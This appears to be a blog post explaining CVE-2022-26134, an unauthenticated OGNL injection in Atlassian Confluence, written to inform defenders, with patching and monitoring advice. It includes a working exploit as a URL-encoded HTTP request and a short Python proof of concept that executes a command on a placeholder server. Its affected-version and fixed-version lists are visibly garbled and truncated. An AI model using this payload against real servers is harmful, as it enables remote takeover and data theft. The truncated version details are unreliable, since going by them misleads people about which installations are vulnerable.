CVE-2022-26134 - Simple Exploit and Deep Dive on the Confluence OGNL Injection Vulnerability

CVE-2022-26134 is a critical security vulnerability found in Atlassian’s Confluence Server and Data Center. It allows an attacker, with no need to log in (“unauthenticated”), to run any code they like on the vulnerable server. In the wrong hands, this can lead to complete compromise of the server—hackers can steal data, install ransomware, or use the machine to attack others.

From 7.18. before 7.18.1

For companies still using those versions, this is not just theory – hackers have actively used this bug in the wild.

What is OGNL Injection?

*OGNL (Object-Graph Navigation Language)* is a scripting language used in some Java technologies including Apache Struts—and in this case, Confluence. An OGNL injection vulnerability means the attacker can pass OGNL code to the server and have it executed, letting them control the server.

The Exploit Details (With Simple Code)

Here’s a very basic example. Imagine an attacker wants the server to run the id command (shows user identity on Unix/Linux). They can do it with a browser or curl.

Let’s say the target is at https://vulnerable-confluence.example.com.

The attacker sends a GET request like this (real attackers would hide their tracks better)

GET /%24%7B%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29%7D/ HTTP/1.1
Host: vulnerable-confluence.example.com

Here’s what’s happening

- /${(@java.lang.Runtime@getRuntime().exec('id'))}/ inserted into the path of the request.

The strange encoding (%24…%7D) is just URL-encoded text.

- @java.lang.Runtime@getRuntime().exec('id') makes Java run the command ‘id’ on the server shell.

Attackers may automate this exploit. Here’s a simple proof-of-concept using Python

import requests

# TARGET your vulnerable Confluence instance
target = "http://vulnerable-confluence.example.com/${(@java.lang.Runtime@getRuntime().exec('id'))}/"

try:
    r = requests.get(target, timeout=10)
    print("Status:", r.status_code)
    print("Server Response:", r.text)
except Exception as e:
    print("Error:", e)

Of course, real attacks would use reverse shells, download malware, etc.

How to Fix CVE-2022-26134

1. Upgrade Confluence immediately

7.18.1

…are safe from this exploit.

Get the latest patches from Atlassian’s Confluence Downloads Page.

Original Advisories and References

- Atlassian Security Advisory 2022-06-02
- MITRE CVE Record
- Rapid7 Blog: Technical Analysis of CVE-2022-26134

Key Takeaways

- CVE-2022-26134 is extremely dangerous: Exploitable by anyone, without logging in, and has been used in real attacks.
- Patch your servers now: If you use Confluence and haven’t patched, stop what you’re doing and update.
- Monitor for compromise: If your system was exposed, check for new user accounts, strange files, and outgoing network connections.

Stay safe, patch early, and monitor your servers!

*This post is exclusive and written simply for those seeking clear, actionable information on CVE-2022-26134. Share to help others stay protected!*

Timeline

Published on: 06/03/2022 22:15:00 UTC
Last modified on: 06/30/2022 06:15:00 UTC